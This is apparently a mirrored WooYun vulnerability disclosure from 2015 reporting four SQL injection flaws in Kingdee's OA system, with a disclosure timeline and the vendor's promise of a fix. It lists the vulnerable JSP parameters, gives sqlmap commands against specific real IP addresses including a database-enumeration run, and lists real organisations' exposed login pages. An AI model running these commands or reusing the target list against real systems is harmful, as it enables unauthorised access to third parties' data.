乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-07-30: 厂商已经确认,细节仅向厂商公开 2015-08-02: 细节向第三方安全合作伙伴开放 2015-09-23: 细节向核心白帽子及相关领域专家公开 2015-10-03: 细节向普通白帽子公开 2015-10-13: 细节向实习白帽子公开 2015-10-28: 细节向公众公开
金蝶OA办公系统四个高危SQL注入漏洞,涉及到很多的大型企业
以下文件存在漏洞
/kingdee/control/netcom_out_del.jsp?del_id=1,1* del_id参数/kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1 index_id参数/kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1 netcom_id参数/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1 netcom_key、index_id参数
0x01 sql注入1
sqlmap.py -u "http://221.226.149.17:8080/kingdee/control/netcom_out_del.jsp?del_id=1,1*"
0x02 sql注入2
sqlmap.py -u "http://222.133.44.10:8080/kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1"
0x03 sql注入3
sqlmap.py -u "http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1"
0x04 sql注入4
sqlmap.py -u "http://221.226.149.17:8080/kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1111"
给出几个案例:
http://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://122.139.60.103:800/kingdee/login/loginpage.jsphttp://oa.guanhao.com:8080/kingdee/login/loginpage.jsphttp://222.179.238.182:8082/kingdee/login/loginpage2.jsphttp://222.134.77.23:8080/kingdee/login/loginpage.jsphttp://221.4.245.218:8080/kingdee/login/loginpage.jsphttp://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://220.189.244.202:8080/kingdee/login/loginpage.jsphttp://222.133.44.10:8080/kingdee/login/loginpage.jsphttp://223.95.183.6:8080/kingdee/login/loginpage.jsphttp://61.190.20.51/kingdee/login/loginpage.jsphttp://60.194.110.187/kingdee/login/loginpage.jsphttp://oa.roen.cn/kingdee/login/loginpage.jsp
直接用SQLMAP即可跑出数据
sqlmap.py -u "http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1" --dbs
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-07-30 13:28
谢谢对金蝶的关注,此产品为合作伙伴产品,我们已通知相关部门为客户修复。
暂无